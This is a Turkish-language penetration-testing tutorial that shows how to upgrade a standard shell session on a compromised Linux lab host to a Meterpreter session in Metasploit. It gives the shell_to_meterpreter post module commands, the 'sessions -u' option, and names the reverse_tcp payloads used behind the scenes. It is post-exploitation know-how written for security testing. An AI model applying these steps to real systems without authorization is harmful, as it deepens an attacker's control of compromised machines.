Sızma Testlerinde Standart Komut Satırının Meterpreter Kabuğuna Yükseltilmesi

0
567
views
Sızma testleri sırasında ele geçirilen hedef sistemin standart komut satırı ile erişim sağlanabilir. Bunun yanında MSF’in kabiliyetlerini kullanmak için Meterpreter kabuğu elde etme ihtiyacı olabilir. Bu yazıda MSF shell_to_meterpreter post modülü ve “sessions -u” komutu kullanılarak standart komut satırı üzerinden Meterpreter erişiminin elde edilmesi incelenecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

192.168.30.139 IP adresli hedef sistem ile alınan “shell linux” bağlantısı aşağıdaki gibidir.

sessions
sessions -i 2
id

 

Not: Bu yazıda hedef sistem Linux olarak seçilmiştir.

 

1) MSF shell_to_meterpreter post modülü ile

Hedef sistemde Meterpreter bağlantısı elde edebilmek için MSF shell_to_meterpreter post modülü kullanılabilir. Bu amaçla modül seçilir ve seçenekleri incelenir.

search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
show options

 

Oturum bilgisi ayarlanır.

set SESSION 2
show options

 

Modül çalıştırılarak Meterpreter bağlantı elde edilir.

run
sessions
sessions -i 3

 

Meterpreter bağlantısı elde edilirken arka planda Windows sistemler için “windows/meterpreter/reverse_tcp“, Linux sistemler için “linux/x86/meterpreter/reverse_tcp“, diğer işletim sistemleri içinse “python/meterpreter/reverse_tcp” kullanılır.

 

2) MSF sessions komutuna ait “-u” seçeneği ile

Benzer olarak MSF sessions komutunun “-u” seçeneğine oturum ID değeri verilerek de Meterpreter elde edilebilir.

sessions -u 2
sessions
sessions -i 4
getuid

 

Bunun yanında standart komut satırı elde edilmiş hedef sistemde bir takım kodlar (Msfvenom ile elde edilmiş payload gibi) çalıştırılarak da Meterpreter bağlantısı elde edilebilir.

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.